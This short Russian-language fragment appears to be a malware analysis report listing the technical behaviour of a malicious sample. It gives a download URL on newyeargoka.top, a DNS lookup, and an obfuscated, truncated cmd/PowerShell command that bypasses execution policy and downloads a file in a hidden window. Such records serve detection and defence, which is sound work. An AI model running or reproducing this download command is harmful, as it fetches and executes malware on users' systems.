Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWE^R^SH^E^L^l.Ex^E^ ^-EXE^cU^tiO^NPoliCy^ byPass -NopROFILe ^-wIn^DOW^St^YL^e HIdD^e^n (Ne^W^-obJ^E^C^t^ ^S^Y^StEm.ne^t.^wEbCLI^e^NT).D^oWNL^O^a^d^F^i^Le(^'http://newyeargoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "PoWE^R^SH^E^L^l.Ex^E^ ^-EXE^cU^tiO^NPoliCy^ byPass -NopROFILe ^-wIn^DOW^St^YL^e HIdD^e^n (Ne^W^-obJ^E^C^t^ ^S^Y^StEm.ne^t.^wEbCLI^e^NT).D^oWNL^O^a^d^F^i^Le(^'http://newyeargoka...' (со скрытым окном)